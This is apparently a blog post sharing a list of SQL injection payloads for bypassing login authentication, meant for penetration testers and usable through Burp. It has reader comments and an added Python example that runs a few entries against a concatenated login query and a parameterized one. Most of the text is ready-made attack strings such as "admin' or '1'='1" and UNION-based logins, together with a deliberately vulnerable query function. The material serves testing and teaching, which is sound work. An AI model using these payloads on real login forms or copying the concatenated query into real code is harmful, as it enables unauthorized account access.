This list can be used by penetration testers when testing for SQL injection authentication bypass. A penetration tester can use it manually or through Burp in order to automate the process. The creator of this list is Dr. Emin İslam Tatlı (OWASP Board Member). If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
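Why entries on the list behave differently from one another, and the fix that stops all of them, shown as an added example (not from the original post or the list's author): a login query built by string concatenation beside its parameterized form, run against a few entries copied from the list. The SQLite table, the account and the function names are assumptions made for the example.

```python
import sqlite3

# Constructed fixture: table, account and function names are hypothetical.
# The plain-text password only keeps the fixture short.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return db

def login_concat(db, user, pw):
    # Vulnerable 'before' form: input is spliced into the SQL text.
    sql = f"SELECT username FROM users WHERE username = '{user}' AND password = '{pw}'"
    return db.execute(sql).fetchone() is not None

def login_param(db, user, pw):
    # Hardened form: input is bound as data and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (user, pw)).fetchone() is not None

def outcome(login, user):
    """Return 'bypass', 'sql_error' or 'rejected' for one username with a wrong password."""
    db = make_db()
    try:
        return "bypass" if login(db, user, "wrong") else "rejected"
    except sqlite3.Error:
        # A syntax error raised by the login query is itself worth alerting on.
        return "sql_error"
    finally:
        db.close()

# Entries copied from the list above (single-quote forms that SQLite parses).
SAMPLES = ["admin' --", "admin' or '1'='1", "admin' or 1=1--", "admin') or ('1'='1"]

def run_regression():
    return {s: (outcome(login_concat, s), outcome(login_param, s)) for s in SAMPLES}

if __name__ == "__main__":
    for sample, (before, after) in run_regression().items():
        print(f"{sample!r:28} concat={before:10} param={after}")
```

The parenthesized entry fails with a syntax error here because this query has no parenthesis to close, which is why the list carries several variants per quoting style; the parameterized form rejects every entry regardless of query shape.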
Dec 27, 2012 @ 14:22:22
Thanks a lot mate for the hard work.
Jan 06, 2013 @ 20:48:08
Great job, thank you!!!
Jan 09, 2013 @ 16:16:30
Hello, thank you netbiosX 🙂
Could you tell me what’s the difference between all these ways?
If there is a break in the website or application, some ways could succeed and others not??!!
Thank you.
Oct 18, 2013 @ 06:40:37
great job
Nov 07, 2016 @ 07:28:05
how to use ??
Sep 08, 2017 @ 04:48:55
Nice list thanks for sharing